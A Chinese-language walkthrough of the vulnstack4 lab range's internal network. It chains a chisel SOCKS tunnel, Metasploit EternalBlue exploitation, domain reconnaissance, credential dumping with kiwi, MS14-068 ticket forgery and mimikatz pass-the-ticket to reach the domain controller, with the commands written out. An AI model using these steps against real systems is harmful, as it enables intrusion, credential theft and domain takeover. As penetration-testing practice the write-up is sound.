vulnstack4 内网篇-CFANZ编程社区

chisel+msf攻入内网

在kali上下载chisel再上传到Ubuntu上

目标服务器开启服务端

./chisel_1.7.6_linux_amd64 server -p 2333 --socks5

攻击机kali开启客户端

./chisel_1.7.6_linux_amd64 client 192.168.142.139:2333 socks

攻击机1080端口开启了socks5监听。即实现将被拿下的目标web机上2333端口的流量转发到攻击机kali的1080端口。

永恒之蓝横向渗透攻击

search ms17_010

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.183.0/24

set threads 50

先扫描ip哪些存在此漏洞,发现192.168.183.1，192.168.183.128两个ip存在

对192.168.183.128进行攻击

set Proxies socks5:127.0.0.1:1080
     #msf全局把代理指向127.0.0.1:1080（攻击机1080端口进行socks5监听）
use exploit/windows/smb/ms17_010_eternalblue   #加载渗透攻击模块
set payload windows/x64/meterpreter/bind_tcp   #因为使用代理所以正向监听
                                                              
set  AutoRunScript post/windows/manage/migrate  #自动化后渗透测试，执行
                                                                 #   一次就可以获得对目标的控制权限
set rhost    192.168.183.128 #设置内网域成员为目标机
set lport 4444  #设置监听端口
run

攻击成功，直接为最高权限

进行简单内网收集

进入shell执行命令

shell                        #进入windows 命令行shell

net view        # 查看局域网内其他主机名

net view /domain  # 查看有几个域

net view /domain:DEMO #查看域中主机

域DEMO中有TESTWIN7-PC 和WIN-ENS2VR5TR3N两台主机。

net localgroup administrators #查看本地管理员组

net group "domain controllers" /domain #查看域控主机的名字

这种情况是必须域用户才能访问，非域用户没有权限执行域命令。我们需要降低权限到普通域用户，或者说模拟假冒普通域用户如/demodouser令牌。

再看whoami，已经降为域用户demo/douser

域控主机即domain controller 为WIN-ENS2VR5TR3N

wmic computersystem get domain #完整域名

完整域名 demo.com

查看域控IP为192.168.183.130

查看域中的用户

存在3个域用户：

Administrator 、douser、 krbtrt

查看用户demo\douser的sid为

S-1-5-21-979886063-1111900045-1414766810-1107

再用systeminfo命令，查看信息

补丁信息

[01]: KB2491683

[02]: KB2534111

[03]: KB2564958

[04]: KB2621440

[05]: KB2653956

[06]: KB2654428

[07]: KB2698365

[08]: KB2705219

[09]: KB2736422

[10]: KB2813430

[11]: KB2900986

[12]: KB2937610

[13]: KB2943357

[14]: KB2978120

[15]: KB2984972

[16]: KB2992611

[17]: KB2999226

[18]: KB3004375

[19]: KB3010788

[20]: KB3023215

[21]: KB3031432

[22]: KB3035126

[23]: KB3037574

[24]: KB3045685

[25]: KB3046269

[26]: KB3072305

[27]: KB3074543

[28]: KB3086255

[29]: KB3097989

[30]: KB3101722

[31]: KB3108371

[32]: KB3122648

[33]: KB3127220

[34]: KB3155178

[35]: KB4019990

[36]: KB4040980

[37]: KB976902

渗透内网就要想到著名的域权限提升漏洞MS14-68，危害很大，可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限。该靶机内网域有没有这个漏洞呢？通过对照相应漏洞补丁号：KB3011780，发现该域网没有装相应补丁，即可能存在MS14-68漏洞。下面我们利用此漏洞进攻域控。

信息搜集到此后，回到meterpreter执行rev2self恢复最高权限。

回到meterpreter,用rev2sel命令重新具有系统最高权限。

先使用msf中的kiwi模块

creds_all #列举所有凭据

明文密码出现

查看桌面发现还有MS14-068.exe ,利用此漏洞提权

MS14-068.exe 利用方法

构造payload如下：

MS14-068.exe -u douser@demo.com -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130

成功生成票据文件“TGT_douser@demo.com.ccache”！

使用mimikatz

mimikatz.exe      #启动Mimikatz
privilege::debug   #取得特权
kerberos::purge         #清空当前主机中所有凭证，否则会影响凭证伪造
kerberos::list           #查看当前机器凭证
kerberos::ptc  <生成的票据文件>      #将票据注入到内存中

票据注入内存

查看是否攻入域控

net use \\WIN-ENS2VR5TR3N

dir \\WIN-ENS2VR5TR3N\c$

dir \\WIN-ENS2VR5TR3N\c$

于是我们可以看到域控主机的文件，换句话说，我们已经拥有了域管理员权限。

后续：本来要继续生成黄金票据或白银票据维持权限，得到dc的明文密码，但是kali攻击机一直连不上，过后再更QAQ。